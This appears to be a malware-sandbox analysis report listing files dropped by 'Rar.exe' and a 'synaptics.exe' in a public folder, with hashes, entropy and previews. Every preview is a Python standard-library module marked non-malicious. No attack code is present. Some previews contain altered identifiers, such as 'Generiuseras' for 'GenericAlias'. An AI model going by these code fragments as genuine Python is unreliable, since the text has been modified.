                                                                                                                                                                                                                                  MD5:FEDBEE2BB47F5372D60AD7EAF7610714
                                                                                                                                                                                                                                  SHA1:E5B59A93FBF7E34F0EBEDFC240FF5930CA3FE18A
                                                                                                                                                                                                                                  SHA-256:1944F39B81A75344487E1B393B948B6EA76FF96E15DA5D2A5D5E94EC000E0885
                                                                                                                                                                                                                                  SHA-512:6CACB563B693C6C0C7335252FA8B7EBE90852F5D71942602B1DADEADEE45E991430120993901D3B4D0C5008540B67C6AD02F0F5039F9C26EE7F194BF872B6FD4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Utilities needed to emulate Python's interactive interpreter....."""....# Inspired by similar code by Jeff Epler and Fredrik Lundh.......import sys..import traceback..from codeop import CommandCompiler, compile_command....__all__ = ["InteractiveInterpreter", "InteractiveConsole", "interact",.. "compile_command"]....class InteractiveInterpreter:.. """Base class for InteractiveConsole..... This class deals with parsing and interpreter state (the user's.. namespace); it doesn't deal with input buffering or prompting or.. input file naming (the filename is always passed in explicitly)..... """.... def __init__(self, locals=None):.. """Constructor..... The optional 'locals' argument specifies the dictionary in.. which code will be executed; it defaults to a newly created.. dictionary with key "__name__" set to "__console__" and key.. "__doc__" set to None..... """.. if locals is None:.. locals = {"__n
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37841
                                                                                                                                                                                                                                  Entropy (8bit):4.406059603619055
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:JsOEZ+8dxiEjo5gFcyjh8Rx+fo62JxMEtiyAmpqiWjI:JEfaxMEtiyAmpqiWjI
                                                                                                                                                                                                                                  MD5:8E0D20F2225EAD7947C73C0501010B0E
                                                                                                                                                                                                                                  SHA1:9012E38B8C51213B943E33B8A4228B6B9EFFC8BC
                                                                                                                                                                                                                                  SHA-256:4635485D9D964C57317126894ADACA91A027E017AEFD8021797B05415E43DBB4
                                                                                                                                                                                                                                  SHA-512:D95B672D4BE4CA904521C371DA4255D9491C9FC4D062EB6CF64EF0AB9CD4207C319BBD5CAABE7ADB2AAAA5342DEE74E3D67C9EA7D2FE55CB1B85DF11EE7E3CD3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:""" codecs -- Python Codec Registry, API and helpers.......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""....import builtins..import sys....### Registry and builtin stateless codec functions....try:.. from _codecs import *..except ImportError as why:.. raise SystemError('Failed to load the builtin codecs: %s' % why)....__all__ = ["register", "lookup", "open", "EncodedFile", "BOM", "BOM_BE",.. "BOM_LE", "BOM32_BE", "BOM32_LE", "BOM64_BE", "BOM64_LE",.. "BOM_UTF8", "BOM_UTF16", "BOM_UTF16_LE", "BOM_UTF16_BE",.. "BOM_UTF32", "BOM_UTF32_LE", "BOM_UTF32_BE",.. "CodecInfo", "Codec", "IncrementalEncoder", "IncrementalDecoder",.. "StreamReader", "StreamWriter",.. "StreamReaderWriter", "StreamRecoder",.. "getencoder", "getdecoder", "getincrementalencoder",.. "getincrementaldecoder", "getreader", "getwriter",.. "encode", "decode", "iter
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5762
                                                                                                                                                                                                                                  Entropy (8bit):4.666424353047493
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:CH1OT+d3PVt56zAg5x4Y0s2WbFr+NRa/y4DQD3vUCMPikrv59S4RzC4XovtrTfoo:sOOPfyASx49WbFrSRa/yCQD3Wit4RzCN
                                                                                                                                                                                                                                  MD5:650CB16239456DB3EE0EC431018677BE
                                                                                                                                                                                                                                  SHA1:1B77A1843EE49FC5A68D11FA83EA7D7A94934293
                                                                                                                                                                                                                                  SHA-256:EF7216362171A4400547499E84253ABF5D9D167490A06E668E5AD4C57FF2B9FB
                                                                                                                                                                                                                                  SHA-512:D7B9EC8FC9233BB149891CC5B4DB661A7EA9F5195451D4384B93895D71FE77B235A6353909574A53AA504D664EE50840C61B63AEE34AC1D92240F504D5C266CA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:r"""Utilities to compile possibly incomplete Python source code.....This module provides two interfaces, broadly similar to the builtin..function compile(), which take program text, a filename and a 'mode'..and:....- Return code object if the command is complete and valid..- Return None if the command is incomplete..- Raise SyntaxError, ValueError or OverflowError if the command is a.. syntax error (OverflowError and ValueError can be produced by.. malformed literals).....The two interfaces are:....compile_command(source, filename, symbol):.... Compiles a single command in the manner described above.....CommandCompiler():.... Instances of this class have __call__ methods identical in.. signature to compile_command; the difference is that if the.. instance compiles program text containing a __future__ statement,.. the instance 'remembers' and compiles all subsequent program texts.. with the statement in force.....The module also provides another class:....Compile():.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):52954
                                                                                                                                                                                                                                  Entropy (8bit):4.506927099682533
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:aCI4z5wctD9O9F2PxdKtDXo0a4vpHKaiJXbxpq6InhjQAo:XI4z5wctBOVUB
                                                                                                                                                                                                                                  MD5:4F8C270F0FFE58F5C0BF455403EF3F44
                                                                                                                                                                                                                                  SHA1:8C0DE07C711CD9486A3FF0D2FC8A5CD4C13AE01A
                                                                                                                                                                                                                                  SHA-256:2E5F3A5A7DE17BC2B2E749F0D2A1387DE2280A0824856360A041B2CA75E77194
                                                                                                                                                                                                                                  SHA-512:418971A91D03756A0B2790286F67135EE386AAA0817932130DDBA8B68DE601D5E29A3DCCEF1D965BAE22E66606C0A3132D179ABEC7E9296B715E1AAD1E6BDFAC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:'''This module implements specialized container datatypes providing..alternatives to Python's general purpose built-in containers, dict,..list, set, and tuple.....* namedtuple factory function for creating tuple subclasses with named fields..* deque list-like container with fast appends and pops on either end..* ChainMap dict-like class for creating a single view of multiple mappings..* Counter dict subclass for counting hashable objects..* OrderedDict dict subclass that remembers the order entries were added..* defaultdict dict subclass that calls a factory function to supply missing values..* UserDict wrapper around dictionary objects for easier dict subclassing..* UserList wrapper around list objects for easier list subclassing..* UserString wrapper around string objects for easier string subclassing....'''....__all__ = [.. 'ChainMap',.. 'Counter',.. 'OrderedDict',.. 'UserDict',.. 'UserList',.. 'UserString',.. 'defaultdict',.. 'd
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):48464
                                                                                                                                                                                                                                  Entropy (8bit):5.115522838538758
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:1bQU3rQFVpyVRbeFRDRBPou+eQyWIrcabGm/9WQxSNGU4QPFHyaqNuTrjfJQRJrG:RQSAVpyWFRDRBPoJIrcabGm/9WQEN6QF
                                                                                                                                                                                                                                  MD5:44A1ACB0D0FC90FF48CD6A49CFD7881F
                                                                                                                                                                                                                                  SHA1:B153F46CDFBA27F52F99BA882C7A3B0E1CD0A5F5
                                                                                                                                                                                                                                  SHA-256:BE3A304B87614FDE3482F68837ACD10B92E1A6767C42E6DEE993D9328FA4A5EA
                                                                                                                                                                                                                                  SHA-512:760DE30F18AC7F067CB42800EE78737F6ED84DA8300C274B46CA9E17043B424D6CA3A8C7BB1DA4F4F06220C60FDAFDDC5A734FAC87470958BF31401DCDBD0405
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.yO......Y.n.w.e.j...e.....z.d.d.l.m.Z...W.n...e.yg......Y.n.w.G.d.d...d.e.j ..Z!G.d.d...d.e.j"..Z#G.d.d...d.e.j$..Z%G.d.d...d.e&..Z'G.d.d...d.e(..Z)z.d.d.l.m)Z)..W.n...e.y.......Y.n.w.z.d.d.l.m*Z*..W.n...e.y.......d.d...Z*Y.n.w.d.d.d.d...d.d...Z+d d!..Z,z.d.d"l.m,Z,..W.n...e.y.......Y.n.w.G.d#d$..d$e(..Z-G.d%d&..d&e.j...Z/G.d'd(..d(e.j...Z0G.d)d*..d*e.j...Z1G.d+d,..d,e.j2..Z3d.S.)-a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtuple factory function for creating tuple subclasses with named fields.* deque list-like container with fast appends and pops on either end.* ChainMap dict-like class for creating a single view of multiple mappings.* Counter dict subclass
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):249
                                                                                                                                                                                                                                  Entropy (8bit):4.8211040436413155
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/jcteC5VvkFZlaE+MdF/Hj5J+uIaHKHtGdgIun:CoeC7gj+Er+xNGdcn
                                                                                                                                                                                                                                  MD5:E436EE7DD594CCDA595797A6BF7E91B3
                                                                                                                                                                                                                                  SHA1:05649B2144754BB61608048C1F9A7E6F6721FAF8
                                                                                                                                                                                                                                  SHA-256:013C7466A125D69B176C935160404AF8F103B4721A81694D8E27EF190EF6EF17
                                                                                                                                                                                                                                  SHA-512:217FF6C36E6A8D95590134ACACC8C575F1BE0C01DBA2A2326E28497E1F43E6FFD5820716A0366675E01824E72C07D6EE1AAB886C5B69F20A466055DC8AA9801E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dz........................@...s$...d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.)......)...*)...__all__)..._CallableGeneriuserasN)..._collections_abcr....r......r....r.....1C:\Users\Public\M20EKMMEH2\lib\collections\abc.py..<module>....s..........
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):122
                                                                                                                                                                                                                                  Entropy (8bit):4.154562766131627
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:16dgXGviibaIF6dgXGvisxCK46dgXGviYHEubWyn:14gX5TIF4gX5GS4gX5AE/y
                                                                                                                                                                                                                                  MD5:BEF5A0AF889CBE656D8F36952B66D86A
                                                                                                                                                                                                                                  SHA1:F58423BE30ACEC27E1B47617F47D2B6C94F01A72
                                                                                                                                                                                                                                  SHA-256:7AD86878712FC6682863F12208F4CED5DAF2DD82B6FF5ED58207DE29D0EFA410
                                                                                                                                                                                                                                  SHA-512:9DD60F99DA7FCAABE8CE08AB012CD507A98EE6E47DDA4A4E462CEB57DB16653B97B21D1DF1436DCCEDB1CD4B59433CECB697BCC3E031B52585F67C8454DB487D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:from _collections_abc import *..from _collections_abc import __all__..from _collections_abc import _CallableGeneriuseras..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4182
                                                                                                                                                                                                                                  Entropy (8bit):4.941140768387096
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:DuOeR5U4DSJVqfXZuNtrytho9oXDi6IX2:DuXPUyeyZk1yI9GDMX2
                                                                                                                                                                                                                                  MD5:155B90E667001B9A1FAE754CB38AFEE8
                                                                                                                                                                                                                                  SHA1:47C7E6928D08DC2FBF692D89B01E59DD8CA82183
                                                                                                                                                                                                                                  SHA-256:33885389962DA4BCD82B1286A184367116F6F407F61E18ECEFB09A1D8F17CF41
                                                                                                                                                                                                                                  SHA-512:0F7458FF53A6039B6F0DE62D7C3050BCF0F76E7B51C7BCE2E849E690B110299B561C5CA48FA5390F98D4148BA3FA6ACC48B1CAF8FAE4C063604005FBCDCD3704
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Conversion functions between RGB and other color systems.....This modules provides two functions for each color system ABC:.... rgb_to_abc(r, g, b) --> a, b, c.. abc_to_rgb(a, b, c) --> r, g, b....All inputs and outputs are triples of floats in the range [0.0...1.0]..(with the exception of I and Q, which covers a slightly larger range)...Inputs outside the valid range may cause exceptions or invalid outputs.....Supported color systems:..RGB: Red, Green, Blue components..YIQ: Luminance, Chrominance (used by composite video signals)..HLS: Hue, Luminance, Saturation..HSV: Hue, Saturation, Value.."""....# References:..# http://en.wikipedia.org/wiki/YIQ..# http://en.wikipedia.org/wiki/HLS_color_space..# http://en.wikipedia.org/wiki/HSV_color_space....__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",.. "rgb_to_hsv","hsv_to_rgb"]....# Some floating point constants....ONE_THIRD = 1.0/3.0..ONE_SIXTH = 1.0/6.0..TWO_THIRD = 2.0/3.0....# YIQ: used by composite video si
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20715
                                                                                                                                                                                                                                  Entropy (8bit):4.1633554259094465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:kFFpRRcNykbCAH86DekbUH1B61Oep2QiNFIboUUW6cUu:kF3RRcBVHpD3YH18RfEiboeX
                                                                                                                                                                                                                                  MD5:86772D3D944A28FBB5A6E79CA763ED41
                                                                                                                                                                                                                                  SHA1:CEAF743DEA6B5E115D6EB4A3369172EE3C572C1A
                                                                                                                                                                                                                                  SHA-256:2A2ADE75EA3DB61BC608962F40AF56F6BEAE3F16F87E8B81824E2D88F9964C2D
                                                                                                                                                                                                                                  SHA-512:1D8638DD0C44C98D56A3BCA8816C788ECE897FD7554917605BE7E5D9CBC9537EC5120AD678B9369A320E89F592614D1D6C3E1BCF4909BF583A0C748E0CD4FAC7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Module/script to byte-compile all .py files to .pyc files.....When called as a script with arguments, this compiles the directories..given as arguments recursively; the -l option prevents it from..recursing into directories.....Without arguments, if compiles all modules on sys.path, without..recursing into subdirectories. (Even though it should do so for..packages -- for now, you'll have to deal with packages separately.)....See module py_compile for details of the actual byte-compilation..."""..import os..import sys..import importlib.util..import py_compile..import struct..import filecmp....from functools import partial..from pathlib import Path....__all__ = ["compile_dir","compile_file","compile_path"]....def _walk_dir(dir, maxlevels, quiet=0):.. if quiet < 2 and isinstance(dir, os.PathLike):.. dir = os.fspath(dir).. if not quiet:.. print('Listing {!r}...'.format(dir)).. try:.. names = os.listdir(dir).. except OSError:.. if quiet < 2:..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39
                                                                                                                                                                                                                                  Entropy (8bit):4.2336188853070205
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SbF8tHyxVWSov:SbFUHoVjov
                                                                                                                                                                                                                                  MD5:F8259102DFC36D919A899CDB8FDE48CE
                                                                                                                                                                                                                                  SHA1:4510C766809835DAB814C25C2223009EB33E633A
                                                                                                                                                                                                                                  SHA-256:52069AEEFB58DAD898781D8BDE183FFDA18FAAE11F17ACE8CE83368CAB863FB1
                                                                                                                                                                                                                                  SHA-512:A77C8A67C95D49E353F903E3BD394E343C0DFA633DCFFBFD7C1B34D5E1BDFB9A372ECE71360812E44C5C5BADFA0FC81387A6F65F96616D6307083C2B3BB0213F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This directory is a Python package...
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1607
                                                                                                                                                                                                                                  Entropy (8bit):4.235604960068566
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QRFwLH5TbpZfLXA3TN9cf7Y961rTR0wMs8ShahNEmfh1GLdEk:kC5XjKK4QrTR05s8Sha7lfbGLv
                                                                                                                                                                                                                                  MD5:D5B3EA2EE977275CB75FA7254050B426
                                                                                                                                                                                                                                  SHA1:26446C7B142D2C5FC70F57A0A84EA25D281699CC
                                                                                                                                                                                                                                  SHA-256:954D4FFDEF55E3B4A273DF7CE43DCD4082DC07FFA0B7CC0BF7C5D7971D2A5103
                                                                                                                                                                                                                                  SHA-512:04B3C3E7195FF5099B17F0DD40F84EB1CB4ECF3D0D214EEB4ECFAE200CE3BE5BB5365B35909AF9FD71FF0A87EFDF30EA8FE891296B8372F795CCB0C518C558A4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Execute computations asynchronously using threads or processes."""....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....from concurrent.futures._base import (FIRST_COMPLETED,.. FIRST_EXCEPTION,.. ALL_COMPLETED,.. CancelledError,.. TimeoutError,.. InvalidStateError,.. BrokenExecutor,.. Future,.. Executor,.. wait,.. as_completed)....__all__ = (.. 'FIRST_COMPLETED',.. 'FIRST_EXCEPTION',.. 'ALL_COMPLETED',.. 'CancelledError',.. 'TimeoutError',.. 'BrokenExecutor',.. 'Future',.. 'Executor',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23504
                                                                                                                                                                                                                                  Entropy (8bit):4.468628954944452
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IFXDpqHFF4MIEh8F6OaoM0fSvPSmP049u35sBwwtJhkff5avYV:UX0vjI7FSCSSms49u35sBwwtJhkHJ
                                                                                                                                                                                                                                  MD5:93DB82D99C74121B1797F2063F319585
                                                                                                                                                                                                                                  SHA1:A0FC36E2E91766B7A99631E8D51B878F8EFA52FE
                                                                                                                                                                                                                                  SHA-256:F76ACCAF92680AC116460909422ABF26209FE57041B627B6C06752977CCEB109
                                                                                                                                                                                                                                  SHA-512:93481B3765891337D8B25DEAAAECA5B79747A7EDC7DFC21F223892028938D61FB75CE1393CB942DAED05AD884320678FA39C5A9A120C26E9244E30D1A50A2EEB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement.....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....import collections..import logging..import threading..import time..import types....FIRST_COMPLETED = 'FIRST_COMPLETED'..FIRST_EXCEPTION = 'FIRST_EXCEPTION'..ALL_COMPLETED = 'ALL_COMPLETED'.._AS_COMPLETED = '_AS_COMPLETED'....# Possible future states (for internal use by the futures package)...PENDING = 'PENDING'..RUNNING = 'RUNNING'..# The future was cancelled by the user.....CANCELLED = 'CANCELLED'..# ...and _Waiter.add_cancelled() was called by a worker...CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'..FINISHED = 'FINISHED'...._FUTURE_STATES = [.. PENDING,.. RUNNING,.. CANCELLED,.. CANCELLED_AND_NOTIFIED,.. FINISHED..]...._STATE_TO_DESCRIPTION_MAP = {.. PENDING: "pending",.. RUNNING: "running",.. CANCELLED: "cancelled",.. CANCELLED_AND_NOTIFIED: "cancelled",.. FINISHED: "finished"..}....# Logger
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32786
                                                                                                                                                                                                                                  Entropy (8bit):4.435552445856024
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:NfMKj9sLbd2C7ZC2lDMQ8giCi/cEziF5BGONrHGhBUM:NkKj9gbd7di/pGrfmh
                                                                                                                                                                                                                                  MD5:8BE1FA85BDB6A2F722E1655E1901D9A5
                                                                                                                                                                                                                                  SHA1:D192DAE1349A0FEFF76F2F38251D29564426B704
                                                                                                                                                                                                                                  SHA-256:8DFCAA4EA1AB7350CB85FFA3DD6E43D99A951FF50A76EA1DBD32842D7AE277A0
                                                                                                                                                                                                                                  SHA-512:E737E322559AACFF016C5994CF466E2B40FDC2B35875301CBD6A25D9FF9C98D4421DC8EB7BC1EC08DF5092ACC06E40F3335699A4F0A81E7D8288695727B59BDC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Implements ProcessPoolExecutor.....The following diagram and text describe the data-flow through the system:....|======================= In-process =====================|== Out-of-process ==|....+----------+ +----------+ +--------+ +-----------+ +---------+..| | => | Work Ids | | | | Call Q | | Process |..| | +----------+ | | +-----------+ | Pool |..| | | ... | | | | ... | +---------+..| | | 6 | => | | => | 5, call() | => | |..| | | 7 | | | | ... | | |..| Process | | ... | | Local | +-----------+ | Process |..| Pool | +----------+ | Worker | | #1..n |..| Executor | | Thread |
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9007
                                                                                                                                                                                                                                  Entropy (8bit):4.337359259102267
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:NVFRR//hda27aGTSqu/UDLWdLNEWjvb/DHjbbpU+izS9ek3/8N1x:NVFRNHDLWdLNvvb/npQ8a
                                                                                                                                                                                                                                  MD5:2896FAE3BBC3EDA99EB9A2715924F3BB
                                                                                                                                                                                                                                  SHA1:C81D93475ECB0C8702D2CB3B57F8ABFE3CFE402C
                                                                                                                                                                                                                                  SHA-256:F53E2BED48B9828D273F7B7A16ACBA0D21005F5FDD9E3054536275538A70E719
                                                                                                                                                                                                                                  SHA-512:A1110CADC406B02E8FB88C98F03D1132476612AF7E8C93D0E6BB413826AEECBC764358A5FA91227A5136BBBE6F7D323095F4C55D16F2723AFAD737524DA13FAD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Implements ThreadPoolExecutor."""....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....from concurrent.futures import _base..import itertools..import queue..import threading..import types..import weakref..import os......_threads_queues = weakref.WeakKeyDictionary().._shutdown = False..# Lock that ensures that new workers are not created while the interpreter is..# shutting down. Must be held while mutating _threads_queues and _shutdown..._global_shutdown_lock = threading.Lock()....def _python_exit():.. global _shutdown.. with _global_shutdown_lock:.. _shutdown = True.. items = list(_threads_queues.items()).. for t, q in items:.. q.put(None).. for t, q in items:.. t.join()....# Register for `_python_exit()` to be called just before joining all..# non-daemon threads. This is used instead of `atexit.register()` for..# compatibility with subint
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):55980
                                                                                                                                                                                                                                  Entropy (8bit):4.368047563053184
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:eBBEAmz8YtgZh2NpD3V7uDkG02ep14pYp4RGOHU32hzkjg2p:eBBEAmz8YtgusFzkjJp
                                                                                                                                                                                                                                  MD5:E2E049217E2DEF4D361FEC0E2C25B507
                                                                                                                                                                                                                                  SHA1:5F959A6B69F00A1AF8EB9822F79D6D66F0EA05D7
                                                                                                                                                                                                                                  SHA-256:F03B42D5031A340528293A9F8F61F65A2F05E0DED3B4CD2E8AE6C81995ED38E5
                                                                                                                                                                                                                                  SHA-512:C6150D588760EC17A7EA4B8401ABB2DB6AD1357E0FC78DCCD8152C135776070BA686C1F66596D515289FF1C6CDDB586E9CEC7423EE92650D72E26C00AD1BB96A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Configuration file parser.....A configuration file consists of sections, lead by a "[section]" header,..and followed by "name: value" entries, with continuations and such in..the style of RFC 822.....Intrinsic defaults can be specified by passing them into the..ConfigParser constructor as a dictionary.....class:....ConfigParser -- responsible for parsing a list of.. configuration files, and managing the parsed database..... methods:.... __init__(defaults=None, dict_type=_default_dict, allow_no_value=False,.. delimiters=('=', ':'), comment_prefixes=('#', ';'),.. inline_comment_prefixes=None, strict=True,.. empty_lines_in_values=True, default_section='DEFAULT',.. interpolation=<unset>, converters=<unset>):.... Create the parser. When `defaults` is given, it is initialized into the.. dictionary or intrinsic defaults. The keys must be strings, the values.. must be appropriate for %()s string in
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26627
                                                                                                                                                                                                                                  Entropy (8bit):4.372794794720749
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:krzxlsXr260wtYBNcBOzUZfpqWzrz4ONszCAthtv6aDrxzCI:kHxlCYBNcB6cpq8QOgi8D
                                                                                                                                                                                                                                  MD5:F26C810F186A8C2F158EEE1090238DDB
                                                                                                                                                                                                                                  SHA1:280B4ABED6C0BFDEF651011ECD21E89F91E6E2A6
                                                                                                                                                                                                                                  SHA-256:ACD2A8C3F86CE069FB43CDE542BA8A8BD17FD9FB27EF5FCF38210D599A7F344F
                                                                                                                                                                                                                                  SHA-512:354F476256213149604F8D79D68AEF37D757FC6A1D3B8FAEB8CA8F77E96F139E2DFBED8AA2FAEBEFDCCB646BAE86254BEEAABD440FE0D3DDABC8207161E4167D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Utilities for with-statement contexts. See PEP 343."""..import abc..import sys..import _collections_abc..from collections import deque..from functools import wraps..from types import MethodType, Generiuseras....__all__ = ["asynccontextmanager", "contextmanager", "closing", "nullcontext",.. "AbstractContextManager", "AbstractAsyncContextManager",.. "AsyncExitStack", "ContextDecorator", "ExitStack",.. "redirect_stdout", "redirect_stderr", "suppress", "aclosing"]......class AbstractContextManager(abc.ABC):.... """An abstract base class for context managers.""".... __class_getitem__ = classmethod(Generiuseras).... def __enter__(self):.. """Return `self` upon entering the runtime context.""".. return self.... @abc.abstractmethod.. def __exit__(self, exc_type, exc_value, traceback):.. """Raise any exception triggered within the runtime context.""".. return None.... @classmethod.. def __subclasshook__(cls, C):.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
